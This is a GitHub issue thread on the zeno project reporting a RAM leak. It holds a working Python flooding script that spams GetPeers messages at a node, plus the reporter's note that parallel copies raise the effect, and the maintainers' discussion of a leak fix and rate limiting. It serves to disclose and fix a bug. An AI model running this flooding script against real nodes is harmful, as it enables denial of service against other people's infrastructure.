### ISSUE TITLE
RAM leak from GetPeers spam 

### ISSUE THREAD

**Issue by Alrighttt** [ssadler/zeno#20]
```
#!/usr/bin/env python3
import binascii
import gevent
import struct
from gevent import socket


def init_peer(peer, port):
    sends = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sends.connect(peer)
    sends.sendall(b'\0' + struct.pack('>H', port))
    while True:
        sends.sendall(binascii.unhexlify(b'00000011e4dfbbb9aeaff2c844181d5f031f2cac00'))

PEER = ('<target IP>', <target port>)

if __name__ == '__main__':
    what = []
    what.append(gevent.spawn(init_peer, PEER, 8888))
    gevent.joinall(what)
```

This seems to induce a ram leak on the target node. It does not require the attacking node to listen on any port. This script can be ran many times in parallel to increase effectiveness.  

After running about 10 instances of this script for ~15 minutes, the RAM usage of the target node increased to ~3.7gb and remained there until the node was restarted. This node's notarization performance decreased drastically after this attack was performed.(round timeouts and listunspent timeouts)

This attack is asymmetrical in that the attacking node can send 100000s of GetPeers requests very quickly, and the target node will respond to every single request not nearly as quickly. While the target is responding to these requests, the CPU usage will be remain very high.

**Comment by ssadler** [comment]
I think I have fixed this in [4972a8](https://github.com/ssadler/zeno/commit/4972a8f98a713c11547041a564ac82963c39b03a); there were 2 things, one was a weird haskell thingy, an actual memory leak, and another is memory fragmentation when you spam the server with hundreds of thousands of packets. The former leaked memory, so when you stop spamming it did not release it. The latter, does appear to release the memory when you stop spamming.

I fixed the memory leak, and rate limited inbound messages to 100 messages/sec per peer. There's also the issue you mentioned on chat, that the server will respond to all of the requests, and it seemed like it was queuing up millions of them in memory. I don't think this is the case; it's true, even if you disconnect the flooding client, the server will try to respond to many more messages, but I think that is because they are queued up in the socket receive buffer, and there is not a huge number of them. I'll close this when the fix gets merged to master, but feel free to reopen / open another ticket if there's still an issue.

**Comment by Alrighttt** [comment]
The main RAM leak is definitely fixed, but I believe there is still a much less severe leak somewhere. Trying to track down how this happens now. I believe it's related to zeno closing connections. 

Rate limiter seems to work as intended. Still possible to eat up CPU cycles, but it's now about 10x less effective and likely is not an issue. Please keep this open for now. Still reevaluating this.

**Comment by ssadler** [comment]
This issue is fixed in master, memory leaks are bound to exist and could pop up again, lets just keep an eye on memory usage and tackle it when it's an issue.
